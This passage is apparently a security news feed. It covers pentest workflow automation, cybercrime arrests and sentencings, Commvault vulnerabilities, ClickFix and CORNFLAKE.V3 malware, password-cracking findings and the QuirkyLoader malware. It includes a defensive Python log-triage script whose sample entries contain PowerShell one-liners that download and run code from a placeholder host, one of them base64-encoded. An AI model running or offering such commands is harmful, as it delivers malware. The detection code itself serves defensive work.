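]


def route(finding):
    """Apply the first matching rule the moment a finding is logged."""
    for rule in RULES:
        if not rule["when"](finding):
            continue
        if rule["action"] == "close":
            finding.status = "closed"
            finding.history.append(f"{rule['name']}: closed without ticket")
        else:
            team = rule["team"] or finding.asset_owner   # None means "route to asset owner"
            finding.ticket = {"team": team, "priority": rule["priority"],
                              "sla_days": rule["sla_days"]}
            finding.history.append(f"{rule['name']}: ticket to {team} as {rule['priority']}")
        return finding
    raise RuntimeError("no rule matched; the default rule should be last")


def mark_resolved(finding):
    """Owner claims the fix is in; this only queues a retest, it never closes."""
    if finding.status not in ("open", "reopened"):
        raise ValueError(f"{finding.id} is {finding.status}, cannot resolve")
    finding.status = "resolved"
    finding.history.append("owner marked resolved; retest queued")
    return finding


def record_retest(finding, passed):
    """Retest result decides closure; a failed retest sends it straight back to the owner."""
    if finding.status != "resolved":
        raise ValueError(f"{finding.id} is {finding.status}, nothing to retest")
    finding.status = "closed" if passed else "reopened"
    finding.history.append("retest passed; closed" if passed else "retest failed; reopened")
    return finding


if __name__ == "__main__":
    sample = [
        Finding("F-1", "SQL injection in login", "critical", True, "payments", "manual"),
        Finding("F-2", "Server banner disclosure", "info", False, "web", "nessus"),
        Finding("F-3", "Outdated jQuery", "medium", False, "web", "nessus"),
    ]
    for f in sample:
        route(f)
    mark_resolved(sample[0]); record_retest(sample[0], passed=False)
    for f in sample:
        print(f.id, f.status, f.ticket, f.history)
```

The two design points worth copying are that the only rule without a predicate sits last, so every finding gets exactly one outcome, and that `mark_resolved` and `record_retest` are separate transitions, which is what makes "resolved" and "verified" measurable as different numbers.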
PlexTrac supports each of these capabilities through its Workflow Automation Engine, helping teams unify and accelerate delivery, remediation, and closure in one platform.
Avoid Common Pitfalls
Automation is about more than just speed. It’s about building standardized, scalable systems. However, if not implemented thoughtfully, it can create new problems.
Watch out for:
- Overcomplicating early efforts: Trying to automate everything at once can stall momentum. Start small and focus on a few repeatable workflows first. Add complexity over time and expand as you validate success.
- Treating automation as a one-time setup: Your workflows should evolve alongside your tools, team structure, and priorities. Failing to iterate leads to stale processes that no longer align with how teams operate.
- Automating without clearly defined workflows: Jumping into automation without first mapping out your current workflows often leads to chaos. Without clear rules for routing, ownership, and escalation, automation may create more problems than it solves.
How to get started
Here’s how to begin automating pentest delivery:
- Map your current workflow: Document how findings are delivered, triaged, assigned, and tracked today.
- Identify friction points: Look for repetitive tasks, handoff delays, and areas where communication breaks down.
- Start small: Automate one or two high-impact steps first, like ticket creation, email alerts, or finding delivery.
- Add complexity over time: As you validate what’s working well, use early results to evolve workflows, add rules, and further streamline.
- Choose the right platform: Look for solutions that integrate with your existing tools and provide visibility across the vulnerability lifecycle.
- Measure impact: Track metrics like MTTR, handoff delays, and retest completion to show the value of your efforts.
The Future of Pentest Delivery
Security teams are shifting from reactive testing to proactive exposure management. Pentest delivery automation is a key part of that evolution, helping teams move faster, collaborate better, and reduce risk more effectively. For service providers, this is a chance to differentiate services, scale operations, and deliver more value with less overhead.
For enterprise teams, it means driving maturity, demonstrating progress, and staying ahead of emerging threats.
Conclusion
Pentesting is too important to be stuck in static reports and manual workflows. By automating delivery, routing, and remediation tracking, organizations can unlock the full value of their offensive security efforts: findings become more actionable, remediation workflows are standardized, and outcomes are measurable. Whether you’re delivering tests to clients or to an internal team, the message is clear: the future of pentest delivery is automated.
Want to see what automated pentest workflows look like in action? Platforms like PlexTrac centralize security data from both manual testing and automated tools, enabling real-time delivery and standardized workflows across the entire vulnerability lifecycle. This article is a contributed piece from one of our valued partners.
INTERPOL Arrests 1,209 Cybercriminals Across 18 African Nations in Global Crackdown
INTERPOL on Friday announced that authorities from 18 countries across Africa have arrested 1,209 cybercriminals who targeted 88,000 victims. “The crackdown recovered $97.4 million and dismantled 11,432 malicious infrastructures, underscoring the global reach of cybercrime and the urgent need for cross-border cooperation,” the agency said. The effort is the second phase of an ongoing law enforcement initiative called Operation Serengeti, which took place between June and August 2025 to tackle severe crimes like ransomware, online scams, and business email compromise (BEC).
The first wave of arrests occurred late last year. Among the highlights are the dismantling of 25 cryptocurrency mining centres in Angola, where 60 Chinese nationals were involved in the illicit money-making scheme. “The crackdown identified 45 illicit power stations which were confiscated, along with mining and IT equipment worth more than $37 million, now earmarked by the government to support power distribution in vulnerable areas,” INTERPOL said. Elsewhere, Zambian authorities have taken down a large-scale online investment fraud operation that claimed 65,000 victims who lost around $300 million after they were lured into investing in cryptocurrency through advertising campaigns that promised high-yield returns.
Fifteen individuals have been arrested in connection with the scheme, with officials seizing domains, mobile numbers, and bank accounts for further investigation. Also disrupted in the southern African country were a scam center and a suspected human trafficking network. Lastly, law enforcement also dismantled a transnational inheritance scam originating in Germany, arresting the primary suspect and confiscating electronics, jewellery, cash, and vehicles. The scam is estimated to have caused losses of around $1.6 million.
“Each INTERPOL-coordinated operation builds on the last, deepening cooperation, increasing information sharing and developing investigative skills across member countries,” Valdecy Urquiza, secretary general of INTERPOL, said. “With more contributions and shared expertise, the results keep growing in scale and impact. This global network is stronger than ever, delivering real outcomes and safeguarding victims.” Singapore-headquartered Group-IB said it provided “circumstantial intelligence” on a cryptocurrency investment scam, along with infrastructure details associated with the scam and other BEC campaigns across the African region. “Cybercrime recognizes no borders, and its impact is truly global,” Dmitry Volkov, Group-IB CEO, said.
“The success of Operation Serengeti 2.0 demonstrates what can be achieved when nations stand together against this threat.” In a post shared on LinkedIn, blockchain intelligence platform TRM Labs said investigators pursued leads tied to the Bl00dy ransomware group in Ghana and acted on information connected to RansomHub, another ransomware operation that abruptly went offline earlier this April. Countries that participated in the crackdown include Angola, Benin, Cameroon, Chad, Côte d’Ivoire, Democratic Republic of Congo, Gabon, Ghana, Kenya, Mauritius, Nigeria, Rwanda, Senegal, South Africa, Seychelles, Tanzania, the United Kingdom, Zambia and Zimbabwe. The disclosure comes as Nigeria deported 102 foreign nationals, including 60 Chinese and 39 people from the Philippines, who were convicted of cyber terrorism and internet fraud, according to the country’s Economic and Financial Crimes Commission (EFCC). The deportees were among 792 suspected cybercriminals arrested in December 2024.
Earlier this March, law enforcement authorities in seven African countries also arrested 306 suspects and confiscated 1,842 devices as part of an international operation codenamed Red Card that took place between November 2024 and February 2025.
Ex-Developer Jailed Four Years for Sabotaging Ohio Employer with Kill-Switch Malware
A 55-year-old Chinese national has been sentenced to four years in prison and three years of supervised release for sabotaging his former employer’s network with custom malware and deploying a kill switch that locked out employees when his account was disabled. Davis Lu, 55, of Houston, Texas, was convicted of causing intentional damage to protected computers in March 2025. He was arrested and charged in April 2021 for abusing his position as a software developer to execute malicious code on his employer’s computer servers. The name of the company was not disclosed, but Cleveland.com revealed he was employed at Eaton Corporation, a multinational power management company that’s headquartered in Beachwood, Ohio.
“The defendant breached his employer’s trust by using his access and technical knowledge to sabotage company networks, wreaking havoc and causing hundreds of thousands of dollars in losses for a U.S. company,” said Acting Assistant Attorney General Matthew R. Galeotti of the Justice Department’s Criminal Division. “However, the defendant’s technical savvy and subterfuge did not save him from the consequences of his actions.” Court documents show that Lu was employed as a software developer for the unnamed company based in Ohio from November 2007 to October 2019.
But after his responsibilities and system access were reduced following a 2018 corporate realignment, Lu enacted a scheme to deliberately introduce malicious code around August 2019, resulting in system crashes and preventing user logins. To pull this off, Lu is said to have created infinite loops in source code to trigger server crashes by repeatedly creating new Java threads without proper termination. He also deleted coworker profile files and implemented a kill switch that would lock out all users if his credentials in the company’s Active Directory were disabled. “The ‘kill switch’ code – which Lu named ‘IsDLEnabledinAD,’ abbreviating ‘Is Davis Lu enabled in Active Directory’ — was automatically activated when he was placed on leave and asked to surrender his laptop on September 9, 2019, and impacted thousands of company users globally,” the Department of Justice said.
“Lu named other code ‘Hakai,’ a Japanese word meaning ‘destruction,’ and ‘HunShui,’ a Chinese word meaning ‘sleep’ or ‘lethargy.’” Furthermore, on the day Lu was instructed to return his company-issued laptop, the defendant deleted encrypted volumes and attempted to erase Linux directories and two additional projects. His internet search history laid bare the methods he researched to escalate privileges, hide processes, and delete files, suggesting an attempt to obstruct the company’s efforts to resolve the issues. Lu’s unlawful actions are estimated to have cost the company hundreds of thousands of dollars in losses, per the department. This case also underscores the importance of identifying insider threats early, added Assistant Director Brett Leatherman of the Federal Bureau of Investigation’s (FBI) Cyber Division.
Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.
Pre-Auth Exploit Chains Found in Commvault Could Enable Remote Code Execution Attacks
Commvault has released updates to address four security gaps that could be exploited to achieve remote code execution on susceptible instances. The list of vulnerabilities, identified in Commvault versions before 11.36.60, is as follows -
- CVE-2025-57788 (CVSS score: 6.9) - A vulnerability in a known login mechanism that allows unauthenticated attackers to execute API calls without requiring user credentials
- CVE-2025-57789 (CVSS score: 5.3) - A vulnerability during the setup phase between installation and the first administrator login that allows remote attackers to exploit the default credentials to gain admin control
- CVE-2025-57790 (CVSS score: 8.7) - A path traversal vulnerability that allows remote attackers to perform unauthorized file system access, resulting in remote code execution
- CVE-2025-57791 (CVSS score: 6.9) - A vulnerability that allows remote attackers to inject or manipulate command-line arguments passed to internal components due to insufficient input validation, resulting in a valid user session for a low-privilege role
watchTowr Labs researchers Sonny Macdonald and Piotr Bazydlo have been credited with discovering and reporting the four security defects in April 2025. All the flagged vulnerabilities have been resolved in versions 11.32.102 and 11.36.60. The Commvault SaaS solution is not affected.
In an analysis published Wednesday, the cybersecurity company said threat actors could fashion these vulnerabilities into two pre-authenticated exploit chains to achieve code execution on susceptible instances: one that combines CVE-2025-57791 and CVE-2025-57790, and the other that strings together CVE-2025-57788, CVE-2025-57789, and CVE-2025-57790. It’s worth noting that the second pre-auth remote code execution chain succeeds only if the built-in admin password hasn’t been changed since installation. The disclosure comes nearly four months after watchTowr Labs reported a critical Commvault Command Center flaw (CVE-2025-34028, CVSS score: 10.0) that could allow arbitrary code execution on affected installations. A month later, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the vulnerability to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation in the wild.
Cybercriminals Deploy CORNFLAKE.V3 Backdoor via ClickFix Tactic and Fake CAPTCHA Pages
Threat actors have been observed leveraging the deceptive social engineering tactic known as ClickFix to deploy a versatile backdoor codenamed CORNFLAKE.V3. Google-owned Mandiant described the activity, which it tracks as UNC5518, as part of an access-as-a-service scheme that employs fake CAPTCHA pages as lures to trick users into providing initial access to their systems, which is then monetized by other threat groups. “The initial infection vector, dubbed ClickFix, involves luring users on compromised websites to copy a malicious PowerShell script and execute it via the Windows Run dialog box,” Google said in a report published today. The access provided by UNC5518 is assessed to be leveraged by at least two different hacking groups, UNC5774 and UNC4108, to initiate a multi-stage infection process and drop additional payloads -
- UNC5774, another financially motivated group that delivers CORNFLAKE as a way to deploy various subsequent payloads
- UNC4108, a threat actor with unknown motivation that uses PowerShell to deploy tools like VOLTMARKER and NetSupport RAT
The attack chain likely begins with the victim landing on a fake CAPTCHA verification page after interacting with search results that employ search engine optimization (SEO) poisoning or malicious ads.
The user is then tricked into running a malicious PowerShell command by launching the Windows Run dialog, which then executes the next-stage dropper payload from a remote server. The newly downloaded script checks if it’s running within a virtualized environment and ultimately launches CORNFLAKE.V3. Observed in both JavaScript and PHP versions, CORNFLAKE.V3 is a backdoor that supports the execution of payloads via HTTP, including executables, dynamic-link libraries (DLLs), JavaScript files, batch scripts, and PowerShell commands. It can also collect basic system information and transmit it to an external server.
The traffic is proxied through Cloudflare tunnels in an attempt to avoid detection. “CORNFLAKE.V3 is an updated version of CORNFLAKE.V2, sharing a significant portion of its codebase,” Mandiant researcher Marco Galli said. “Unlike V2, which functioned solely as a downloader, V3 features host persistence via a registry Run key, and supports additional payload types.” Both generations are markedly different from their progenitor, a C-based downloader that uses TCP sockets for command-and-control (C2) communications and only has the ability to run DLL payloads. Persistence on the host is achieved by means of Windows Registry changes.
At least three different payloads are delivered via CORNFLAKE.V3. This comprises an Active Directory reconnaissance utility, a script to harvest credentials via Kerberoasting, and another backdoor referred to as WINDYTWIST.SEA, a C version of WINDYTWIST that supports relaying TCP traffic, providing a reverse shell, executing commands, and removing itself. Select versions of WINDYTWIST.SEA have also been observed attempting to move laterally in the network of the infected machine. “To mitigate malware execution through ClickFix, organizations should disable the Windows Run dialog box where possible,” Galli said.
“Regular simulation exercises are crucial to counter this and other social engineering tactics. Furthermore, robust logging and monitoring systems are essential for detecting the execution of subsequent payloads, such as those associated with CORNFLAKE.V3.”
The Rise of ClickFix Kits
The use of ClickFix has soared in popularity among threat actors over the past year, as it dupes users into infecting their machines under the pretext of helping them solve minor technical issues, completing CAPTCHA verification checks by impersonating Cloudflare Turnstile, or spoofing a Discord server supposedly needing to verify a user before they can join. This, in turn, entails giving users instructions that involve clicking prompts and copying, pasting, and running commands directly in the Windows Run dialog box, Windows Terminal, Windows PowerShell, or macOS Terminal, depending on the operating system used. “Because ClickFix relies on human intervention to launch the malicious commands, a campaign that uses this technique could get past conventional and automated security solutions,” Microsoft said in a detailed write-up.
“It’s often combined with delivery vectors such as phishing, malvertising, and drive-by compromises, most of which even impersonate legitimate brands and organizations to further reduce suspicion from their targets.” The social engineering ploy has been embraced by numerous threat actors to deliver information stealers (Lumma Stealer), remote access trojans (Xworm, AsyncRAT, NetSupport RAT, and SectopRAT), malware loaders (Latrodectus and MintsLoader), rootkits (r77), and banking trojans (Lampion). Microsoft said it has also observed several threat actors peddling configurable ClickFix builders (also called “Win + R”) on popular cybercrime forums since late 2024 for anywhere from $200 to $1,500 per month. Other offerings include one-time and piecemeal solutions, for example the source code, landing page, or the command line used to kick off the infection, for prices between $200 and $500. “Some of these actors are bundling ClickFix builders into their existing kits that already generate various files such as LNK, JavaScript, and SVG files,” the Windows maker said.
“The kits offer creation of landing pages with a variety of available lures including Cloudflare.” “They also offer construction of malicious commands that users will paste into the Windows Run dialog. These kits claim to guarantee antivirus and web protection bypass (some even promise that they can bypass Microsoft Defender SmartScreen), as well as payload persistence.” To counter ClickFix-style attacks, it’s advised that users are educated to identify social engineering attacks and be careful of what’s being pasted in apps like Terminal or PowerShell. Organizations are recommended to consider using enterprise-managed browsers, block web pages from automatically running Flash plugins, and turn on safe attachments policies for incoming messages. Other steps include -
- Enable PowerShell script block logging to detect and analyze obfuscated or encoded commands for enhanced visibility
- Use PowerShell execution policies such as AllSigned or RemoteSigned to help reduce the risk of malicious execution
- Use Group Policy to deploy hardening configurations, such as removing the Run menu from the Start Menu, prohibiting the launch of native Windows binaries from Run, and configuring Windows Terminal to alert users when they are pasting text that contains multiple lines
USB Infection Drops XMRig Miner
The disclosure comes as the threat intelligence firm detailed an ongoing campaign that has employed USB drives to infect other hosts and deploy cryptocurrency miners since September 2024.
“This demonstrates the continued effectiveness of initial access via infected USB drives,” Mandiant said. “The low cost and ability to bypass network security make this technique a compelling option for attackers.” The attack chain starts when a victim is tricked into executing a Windows shortcut (LNK) on the compromised USB drive. The LNK file results in the execution of a Visual Basic script also located in the same folder. The script, for its part, launches a batch script to initiate the infection -
- DIRTYBULK, a C++ DLL launcher that initiates the execution of other malicious components, such as CUTFAIL
- CUTFAIL, a C++ malware dropper responsible for decrypting and installing malware onto a system, such as HIGHREPS and PUMPBENCH, as well as third-party libraries like OpenSSL, libcurl, and WinPthreadGC
- HIGHREPS, a downloader that retrieves additional files to ensure persistence of PUMPBENCH
- PUMPBENCH, a C++ backdoor that facilitates reconnaissance, provides remote access by communicating with a PostgreSQL database server, and downloads XMRig
- XMRig, an open-source software for mining cryptocurrencies such as Monero, Dero, and Ravencoin
“PUMPBENCH spreads by infecting USB drives,” Mandiant said.
“It scans the system for available drives and then creates a batch file, a VBScript file, a shortcut file, and a DAT file.”
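Of the hardening steps listed for ClickFix above, logging is the one that yields evidence a SOC can act on: script block logging records what the pasted one-liner actually executes (PowerShell event 4104), and process-creation auditing records the command line that launched it. As an added example (not Mandiant's or Microsoft's detection content), the Python below triages constructed log entries for the combination that characterises the ClickFix one-liner: a hidden window, an encoded command, and a download cradle handed to Invoke-Expression. The indicator names, patterns, threshold and sample entries (using example.invalid hosts) are our own assumptions.

```python
"""Triage of PowerShell command-line and script-block log entries for the
ClickFix pattern: a one-liner pasted into the Run dialog that hides its window,
carries an encoded command, and pulls the next stage from a remote host.
Added illustration; not Mandiant's or Microsoft's detection content."""
import base64
import re

# Indicator names and patterns are our own, not vendor rule identifiers.
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "download_cradle": re.compile(
        r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b"
        r"|Invoke-RestMethod|\birm\b|Net\.WebClient", re.I),
    "dynamic_exec": re.compile(r"Invoke-Expression|\biex\b", re.I),
}
# -e / -ec / -enc / -EncodedCommand followed by a base64 blob
ENCODED_ARG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(text):
    """Return the plaintext of an -EncodedCommand argument (base64 of UTF-16LE),
    or None when the entry carries no decodable encoded command."""
    match = ENCODED_ARG.search(text)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_entry(text):
    """Return the set of indicators matched by one log entry. The encoded
    layer is expanded first so that encoding alone cannot hide a cradle."""
    hits = set()
    decoded = decode_encoded_command(text)
    if decoded is not None:
        hits.add("encoded_command")
    for layer in (text, decoded or ""):
        for name, pattern in INDICATORS.items():
            if pattern.search(layer):
                hits.add(name)
    return hits


def triage(entries, min_hits=2):
    """Return (index, sorted indicators) for entries with at least min_hits
    indicators. One hit on its own (an admin running Invoke-WebRequest) is too
    noisy to alert on; the ClickFix one-liner trips several at once."""
    flagged = []
    for index, entry in enumerate(entries):
        hits = analyze_entry(entry)
        if len(hits) >= min_hits:
            flagged.append((index, sorted(hits)))
    return flagged


def _encode(command):
    """Build an -EncodedCommand argument the way powershell.exe expects it."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


# Constructed samples, not telemetry from any real host. Entry 0 is a process
# command line as process-creation auditing would record it; entries 1-3 are
# ScriptBlockText values as script block logging would record them.
SAMPLE_LOG_ENTRIES = [
    # ClickFix-style line: hidden window, encoded command, download cradle
    "powershell -w hidden -enc " + _encode(
        "iex (New-Object Net.WebClient).DownloadString('http://example.invalid/c')"),
    # same idea in plain text, as pasted from a fake verification page
    "iex (irm http://example.invalid/verify)",
    # routine administration that must not alert
    "Get-Service | Where-Object Status -eq 'Running'",
    "Invoke-WebRequest -Uri https://example.invalid/report.csv -OutFile C:\\temp\\report.csv",
]

if __name__ == "__main__":
    for index, indicators in triage(SAMPLE_LOG_ENTRIES):
        print(f"entry {index}: {', '.join(indicators)}")
```

The threshold of two indicators is deliberate: a single download cradle is everyday administration, whereas a hidden window combined with an encoded cradle is the shape of the command a fake CAPTCHA page asks the user to paste. Decoding the encoded layer before matching is what keeps `-EncodedCommand` from defeating the patterns.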
Weak Passwords and Compromised Accounts: Key Findings from the Blue Report 2025
As security professionals, it’s easy to get caught up in a race to counter the latest advanced adversary techniques. Yet the most impactful attacks often aren’t from cutting-edge exploits, but from cracked credentials and compromised accounts. Despite widespread awareness of this threat vector, Picus Security’s Blue Report 2025 shows that organizations continue to struggle with preventing password cracking attacks and detecting the malicious use of compromised accounts. With the first half of 2025 behind us, compromised valid accounts remain the most under-prevented attack vector, highlighting the urgent need for a proactive approach focused on the threats that are evading organizations’ defenses.
A Wake-Up Call: The Alarming Rise in Password Cracking Success
The Picus Blue Report is an annual research publication that analyzes how well organizations are preventing and detecting real-world cyber threats. Unlike traditional reports that focus solely on threat trends or survey data, the Blue Report is based on empirical findings from over 160 million attack simulations conducted within organizations’ networks around the world, using the Picus Security Validation Platform. In the Blue Report 2025, Picus Labs found that password cracking attempts succeeded in 46% of tested environments, nearly doubling the success rate from last year. This sharp increase highlights a fundamental weakness in how organizations are managing – or mismanaging – their password policies.
Weak passwords and outdated hashing algorithms continue to leave critical systems vulnerable to attackers using brute-force or rainbow table attacks to crack passwords and gain unauthorized access. Given that password cracking is one of the oldest and most reliably effective attack methods, this finding points to a serious issue: in their race to combat the latest, most sophisticated new breed of threats, many organizations are failing to enforce strong basic password hygiene policies while failing to adopt and integrate modern authentication practices into their defenses.
Why Organizations Are Failing to Prevent Password Cracking Attacks
So, why are organizations still failing to prevent password cracking attacks? The root cause lies in the continued use of weak passwords and outdated credential storage methods.
Many organizations still rely on easily guessable passwords and weak hashing algorithms, often without using proper salting techniques or multi-factor authentication (MFA). In fact, our survey results showed that 46% of environments had at least one password hash cracked and converted to cleartext, highlighting the inadequacy of many password policies, particularly for internal accounts, where controls are often more lax than they are for their external counterparts. To combat this, organizations must enforce stronger password policies, implement multi-factor authentication (MFA) for all users, and regularly validate their credential defenses. Without these improvements, attackers will continue to compromise valid accounts, obtaining easy access to critical systems.
Credential-Based Attacks: A Silent but Devastating Threat
The threat of credential abuse is both pervasive and dangerous, yet as the Blue Report 2025 highlights, organizations are still underprepared for this form of attack. And once attackers obtain valid credentials, they can easily move laterally, escalate privileges, and compromise critical systems. Infostealers and ransomware groups frequently rely on stolen credentials to spread across networks, burrowing deeper and deeper, often without triggering detection. This stealthy movement within the network allows attackers to maintain long dwell times, undetected, while they exfiltrate data at will.
Despite this ongoing and well-known issue, organizations continue to prioritize perimeter defenses, often leaving identity and credential protection overlooked and under-funded as a result. This year’s Blue Report clearly shows that valid account abuse is at the core of modern cyberattacks, reinforcing the urgent need for a stronger focus on identity security and credential validation.
Valid Accounts (T1078): The Most Exploited Path to Compromise
One of the key findings in the Blue Report 2025 is that Valid Accounts (MITRE ATT&CK T1078) remains the most exploited attack technique, with a truly concerning 98% success rate. This means that once attackers gain access to valid credentials, whether through password cracking or initial access brokers, they can swiftly move through an organization’s network, often bypassing traditional defenses.
The use of compromised credentials is particularly effective because it allows attackers to operate under the radar, making it harder for security teams to detect malicious activity. Once inside, they can access sensitive data, deploy malware, or create new attack paths, all while seamlessly blending in with legitimate user activity.
How to Strengthen Your Defenses Against Credential Abuse and Password Cracking
To protect against increasingly effective attacks, organizations should implement stronger password policies and enforce complexity requirements, while eliminating outdated hashing algorithms in favor of more secure alternatives. It is also essential to adopt multi-factor authentication (MFA) for all sensitive accounts, ensuring that even if credentials do become compromised, attackers can’t just use them to access the network without an additional verification step.
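The hashing point made in this piece (unsalted, fast hashes versus a salted, slow alternative) is easiest to see in code. The following is an added example, not Picus Labs code or the Blue Report's methodology: it puts an unsalted MD5 store beside a salted scrypt store and runs the kind of precomputed-table check that a credential-validation exercise relies on, against a constructed wordlist and user database. The wordlist, usernames, passphrases and scrypt parameters are our own assumptions.

```python
"""Legacy versus hardened credential storage, as an added illustration (not
Picus code). Shows why an unsalted fast hash falls to a precomputed table while
a per-user salt plus a memory-hard KDF takes that shortcut away."""
import hashlib
import hmac
import os

# Constructed wordlist standing in for an attacker's dictionary or rainbow table.
COMMON_PASSWORDS = ["password", "123456", "Welcome1", "Summer2025!", "qwerty"]

# scrypt cost parameters (our choice): n=2**14, r=8 needs 16 MiB per guess,
# which is what makes bulk guessing expensive. Raise them as hardware allows.
SCRYPT_PARAMS = {"n": 2 ** 14, "r": 8, "p": 1}


def legacy_hash(password):
    """Unsalted MD5: the outdated, salt-free scheme the report warns about."""
    return hashlib.md5(password.encode()).hexdigest()


def build_lookup_table(wordlist):
    """Hash the wordlist once. Without salts, the same table cracks every
    account in every database that uses this scheme."""
    return {legacy_hash(word): word for word in wordlist}


def audit_legacy_db(user_db, table):
    """Defender-side check: which accounts hold a hash that a precomputed
    table recovers instantly? Returns [(username, plaintext), ...]."""
    return [(user, table[h]) for user, h in user_db.items() if h in table]


def hash_password(password, salt=None):
    """Hardened scheme: random 16-byte salt + scrypt, stored as salt$digest."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.scrypt(password.encode(), salt=salt, dklen=32, **SCRYPT_PARAMS)
    return f"{salt.hex()}${digest.hex()}"


def verify_password(password, stored):
    """Recompute with the stored salt and compare in constant time."""
    salt_hex, digest_hex = stored.split("$", 1)
    candidate = hashlib.scrypt(password.encode(), salt=bytes.fromhex(salt_hex),
                               dklen=32, **SCRYPT_PARAMS)
    return hmac.compare_digest(candidate, bytes.fromhex(digest_hex))


def shared_password_links_accounts(scheme, password):
    """True if two users choosing the same password end up with identical
    stored values, so cracking one reveals the other. True for legacy_hash,
    False for hash_password because each call draws a fresh salt."""
    return scheme(password) == scheme(password)


# Constructed user database on the legacy scheme: "alice" reused a common
# password, "bob" has a passphrase that is not in the wordlist.
LEGACY_USER_DB = {
    "alice": legacy_hash("Summer2025!"),
    "bob": legacy_hash("tram-kettle-orbit-quiet-seven"),
}

if __name__ == "__main__":
    table = build_lookup_table(COMMON_PASSWORDS)
    print("crackable legacy accounts:", audit_legacy_db(LEGACY_USER_DB, table))
    stored = hash_password("Summer2025!")
    print("scrypt verify (correct):", verify_password("Summer2025!", stored))
    print("scrypt verify (wrong):  ", verify_password("Winter2025!", stored))
```

The audit function is the part a blue team would keep: run it against an export of legacy hashes and a current wordlist, and every hit is an account that needs a reset before migration to the salted scheme. Note that the salt defeats precomputation but not a determined online guess against one account; that is what the MFA and lockout controls discussed above are for.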
Regularly validating credential defenses through simulated attacks is crucial to identifying vulnerabilities and ensuring that your controls are performing as expected. Organizations also need to enhance their behavioral detection capabilities to catch anomalous activities tied to credential abuse and lateral movement. Additionally, monitoring and inspecting outbound traffic for signs of data exfiltration and ensuring that data loss prevention (DLP) measures are both in place and operating effectively are critical to protecting your sensitive information.
Closing the Gaps in Credential and Password Management
The findings in the Blue Report 2025 show that, unfortunately, many organizations are still vulnerable to the silent threat of password cracking and compromised accounts.
And while strengthening perimeter defenses continues to be a priority, it’s also clear that core weaknesses lie in credential management and internal controls. The report also highlighted the fact that infostealers and ransomware groups are leveraging these gaps effectively. If you’re ready to take proactive steps to harden your security posture, reduce your exposure, and prioritize your critical vulnerabilities, the Blue Report 2025 offers invaluable insights to show you where to focus. And at Picus Security, we’re always happy to talk about helping your organization meet its specific security needs.
Don’t forget to get your copy of The Blue Report 2025 and take proactive steps today to improve your security posture. This article is a contributed piece from one of our valued partners.
Hackers Using New QuirkyLoader Malware to Spread Agent Tesla, AsyncRAT and Snake Keylogger
Cybersecurity researchers have disclosed details of a new malware loader called QuirkyLoader that has been used in email spam campaigns since November 2024 to deliver an array of next-stage payloads ranging from information stealers to remote access trojans. Some of the notable malware families distributed using QuirkyLoader include Agent Tesla, AsyncRAT, Formbook, Masslogger, Remcos RAT, Rhadamanthys Stealer, and Snake Keylogger. IBM X-Force, which detailed the malware, said the attacks involve sending spam emails from both legitimate email service providers and a self-hosted email server. These emails feature a malicious archive, which contains a DLL, an encrypted payload, and a real executable.
“The actor uses DLL side-loading, a technique where launching the legitimate executable also loads the malicious DLL,” security researcher Raymond Joseph Alfonso said. “This DLL, in turn, loads, decrypts, and injects the final payload into its target process.” This is achieved by using process hollowing to inject the malware into one of three processes: AddInProcess32.exe, InstallUtil.exe, or aspnet_wp.exe. The DLL loader, per IBM, has been used in limited campaigns for the past few months, with two campaigns observed in July 2025 targeting Taiwan and Mexico. The campaign targeting Taiwan is said to have specifically singled out employees of Nusoft Taiwan, a network and internet security research company based in New Taipei City, with the goal of infecting them with Snake Keylogger, which is capable of stealing sensitive information from popular web browsers, keystrokes, and clipboard content.
The Mexico-related campaign, on the other hand, is assessed to be random, with the infection chains delivering Remcos RAT and AsyncRAT. “The threat actor consistently writes the DLL loader module in .NET languages and uses ahead-of-time (AOT) compilation,” Alfonso said. “This process compiles the code into native machine code before execution, making the resulting binary appear as though it were written in C or C++.”
New Phishing Trends
The development comes as threat actors are using new QR code phishing (aka quishing) tactics like splitting malicious QR codes into two parts or embedding them within legitimate ones in email messages propagated via phishing kits like Gabagool and Tycoon, respectively, to evade detection, demonstrating ongoing evolution. “Malicious QR codes are popular with attackers for several reasons,” Barracuda researcher Rohit Suresh Kanase said.
“They cannot be read by humans so don’t raise any red flags, and they can often bypass traditional security measures such as email filters and link scanners.” “Furthermore, since recipients often have to switch to a mobile device to scan the code, it can take users out of the company security perimeter and away from protection.” The findings also follow the emergence of a phishing kit used by the PoisonSeed threat actor to acquire credentials and two-factor authentication (2FA) codes from individuals and organizations to gain access to victims’ accounts and use them to send emails for carrying out cryptocurrency scams. “The domains hosting this phishing kit impersonate login services from prominent CRM and bulk email companies like Google, SendGrid, Mailchimp, and likely others, targeting individuals’ credentials,” NVISO Labs said. “PoisonSeed employs spear-phishing emails embedding malicious links, which redirect victims to their phishing kit.” A noteworthy aspect of the kit is the use of a technique known as precision-validated phishing, in which the attacker validates an email address in real time in the background while a fake Cloudflare Turnstile challenge is served to the user. Once the checks are passed, a login form impersonating the legitimate online platform appears, allowing the threat actors to capture submitted credentials and then relay them to the service.
Scattered Spider Hacker Gets 10 Years, $13M Restitution for SIM Swapping Crypto Theft
A 20-year-old member of the notorious cybercrime gang known as Scattered Spider has been sentenced to ten years in prison in the U.S. in connection with a series of major hacks and cryptocurrency thefts. Noah Michael Urban pleaded guilty to charges related to wire fraud and aggravated identity theft back in April 2025. News of Urban’s sentencing was reported by Bloomberg and Jacksonville news outlet News4JAX.
In addition to 120 months in federal prison, Urban faces three years of supervised release and has been ordered to pay $13 million in restitution to victims. In a statement shared with security journalist Brian Krebs, Urban called the sentence unjust. Urban, who also went by the aliases Sosa, Elijah, King Bob, Gustavo Fring, and Anthony Ramirez, was arrested by U.S. authorities in Florida in January 2024 for committing wire fraud and aggravated identity theft between August 2022 and March 2023.
